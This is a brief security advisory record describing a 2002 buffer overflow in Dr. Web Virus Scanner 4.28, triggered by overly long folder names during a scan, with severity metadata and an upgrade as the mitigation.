vendor: Dr. Web Virus Scanner
by: SecurityFocus
CVSS: 7.5 HIGH
Buffer Overflow
CWE: 120
Product Name: Dr. Web Virus Scanner
Affected Version From: 4.28
Affected Version To: 4.28
Patch Exists: YES
Related CWE: N/A
CPE: Dr.Web
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2002
Dr. Web Virus Scanner Buffer Overflow Vulnerability
A buffer overflow vulnerability has been reported for Dr. Web virus scanner. The vulnerability is due to insufficient bounds checking when processing folder names. An attacker is able to exploit this vulnerability by creating a malicious folder name of excessive length. When a virus scan is initiated, processing the folder name will trigger the buffer overflow condition. Successful exploitation of this issue will result in the execution of attacker-supplied code with the privileges of the Dr. Web virus scanner process.
Mitigation: Upgrade to the latest version of Dr. Web virus scanner.